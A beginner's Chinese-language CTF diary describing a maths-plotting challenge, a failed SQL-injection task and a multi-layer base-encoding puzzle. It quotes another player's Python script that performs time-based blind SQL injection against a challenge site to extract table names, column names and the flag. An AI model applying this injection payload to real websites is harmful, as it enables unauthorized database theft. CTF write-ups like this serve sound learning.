菜鸡打ctf,做了一天牢,算上签到题一共做上两道
签到
数学但高中
给出了一大串,一开始没看懂,学姐提醒才知道要画图
python太菜,只好手动一个一个粘
公式画图网址:https://www.desmos.com/calculator?lang=zh-CN
最后生成的图片:
然后试了半天sql没注进去,大佬的代码也没看懂
1 import requests 2 3 # sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #Flllag 4 # sql = "select group_concat(column_name) from information_schema.columns where table_name='Flllag' and table_schema=database()" #Flagg 5 sql = "select group_concat(Flagg) from Flllag" 6 j = 36 7 flag = "flag{h3Ltx545LiDwpjQ8Ij1x241wIxS4fa" 8 9 10 while True: 11 for i in range(32, 128): 12 burp0_url = "http://web-bd1bbd084b.challenge.xctf.org.cn/index.php?id=1'||case+when(ascii(substr(({}),{},1))={})then(select sum('1')from information_schema.tables A,information_schema.columns B,information_schema.columns C)end-- ".format(sql, j, i) 13 print burp0_url 14 try: 15 requests.get(burp0_url, timeout=3) 16 if i == 127: 17 j = -1 18 except: 19 flag += chr(i) 20 print flag 21 j += 1 22 break 23 24 if j == -1: 25 print flag 26 exit(0)
还有个song,学姐拿到了个flag.txt,但是要密码
打开是这样的:
整了半天没搞明白是什么东西,搜了半天感觉跟pdf的图片扫出来的文字很像
结果最后看大佬wp发现是base85+64+62+58+32
这个32不太好使,换一个
剩下的看不懂,等会接着坐牢去了
大佬wp:https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg